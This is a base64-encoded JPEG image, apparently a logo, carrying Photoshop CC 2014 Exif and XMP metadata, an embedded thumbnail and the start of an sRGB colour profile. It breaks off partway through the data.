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dW0AAAAMYnVpbHRpblByb29mAAAACXByb29mQ01ZSwA4QklNBDsAAAAAAi0AAAAQAAAAAQAAAAAAEnByaW50T3V0cHV0T3B0aW9ucwAAABcAAAAAQ3B0bmJvb2wAAAAAAENsYnJib29sAAAAAABSZ3NNYm9vbAAAAAAAQ3JuQ2Jvb2wAAAAAAENudENib29sAAAAAABMYmxzYm9vbAAAAAAATmd0dmJvb2wAAAAAAEVtbERib29sAAAAAABJbnRyYm9vbAAAAAAAQmNrZ09iamMAAAABAAAAAAAAUkdCQwAAAAMAAAAAUmQgIGRvdWJAb+AAAAAAAAAAAABHcm4gZG91YkBv4AAAAAAAAAAAAEJsICBkb3ViQG/gAAAAAAAAAAAAQnJkVFVudEYjUmx0AAAAAAAAAAAAAAAAQmxkIFVudEYjUmx0AAAAAAAAAAAAAAAAUnNsdFVudEYjUHhsQFIAAAAAAAAAAAAKdmVjdG9yRGF0YWJvb2wBAAAAAFBnUHNlbnVtAAAAAFBnUHMAAAAAUGdQQwAAAABMZWZ0VW50RiNSbHQAAAAAAAAAAAAAAABUb3AgVW50RiNSbHQAAAAAAAAAAAAAAABTY2wgVW50RiNQcmNAWQAAAAAAAAAAABBjcm9wV2hlblByaW50aW5nYm9vbAAAAAAOY3JvcFJlY3RCb3R0b21sb25nAAAAAAAAAAxjcm9wUmVjdExlZnRsb25nAAAAAAAAAA1jcm9wUmVjdFJpZ2h0bG9uZwAAAAAAAAALY3JvcFJlY3RUb3Bsb25nAAAAAAA4QklNA+0AAAAAABAASAAAAAEAAgBIAAAAAQACOEJJTQQmAAAAAAAOAAAAAAAAAAAAAD+AAAA4QklNBA0AAAAAAAQAAAB4OEJJTQQZAAAAAAAEAAAAHjhCSU0D8wAAAAAACQAAAAAAAAAAAQA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9mZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4AAAAAABwAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAAAAP//////////////////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dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiB4bXA6Q3JlYXRlRGF0ZT0iMjAxNC0wNy0xNVQwMjo1MDowMSswOTowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxNC0wNy0xNVQwNDoyNzo1MiswOTowMCIgeG1wOk1vZGlmeURhdGU9IjIwMTQtMDctMTVUMDQ6Mjc6NTIrMDk6MDAiIGRjOmZvcm1hdD0iaW1hZ2UvanBlZyIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5NWE4ODM2OS04ZTI1LWI0NGMtYmEzYi0zODY4YWU3ZjE4MzkiIHhtcE1NOkRvY3VtZW50SUQ9ImFkb2JlOmRvY2lkOnBob3Rvc2hvcDplZTYxZjYxZS0wYjhjLTExZTQtYWNmYy04ZTIyOGM5NDhiMGMiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDo4YTczMmUwOS1iZGRjLTY1NDQtOTM0NS0zMjgyYmFhMTkyOTYiIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSI+IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImNyZWF0ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6OGE3MzJlMDktYmRkYy02NTQ0LTkzNDUtMzI4MmJhYTE5Mjk2IiBzdEV2dDp3aGVuPSIyMDE0LTA3LTE1VDAyOjUwOjAxKzA5OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNCAoV2luZG93cykiLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjY4YmQyNmEzLTI2YjUtZTQ0My04ODdmLThlZTgwMDZkMzk2OCIgc3RFdnQ6d2hlbj0iMjAxNC0wNy0xNVQwMjo1MTozNCswOTowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoxNjkyMGExZC1iZTVmLTE4NGQtOGM0ZC1jNGMyNzgyMWU5MmEiIHN0RXZ0OndoZW49IjIwMTQtMDctMTVUMDQ6Mjc6NTIrMDk6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY29udmVydGVkIiBzdEV2dDpwYXJhbWV0ZXJzPSJmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvanBlZyIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iZGVyaXZlZCIgc3RFdnQ6cGFyYW1ldGVycz0iY29udmVydGVkIGZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9qcGVnIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo5NWE4ODM2OS04ZTI1LWI0NGMtYmEzYi0zODY4YWU3ZjE4MzkiIHN0RXZ0OndoZW49IjIwMTQtMDctMTVUMDQ6Mjc6NTIrMDk6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6MTY5MjBhMWQtYmU1Zi0xODRkLThjNGQtYzRjMjc4MjFlOTJhIiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjhhNzMyZTA5LWJkZGMtNjU0NC05MzQ1LTMyODJiYWExOTI5NiIgc3RSZWY6b3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjhhNzMyZTA5LWJkZGMtNjU0NC05MzQ1LTMyODJiYWExOTI5NiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8P3hwYWNrZXQgZW5kPSJ3Ij8+/+IMWElDQ19QUk9GSUxFAAEBAAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IAAAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtwdAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABwZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwAAAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAAAABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAAEnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAAARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAA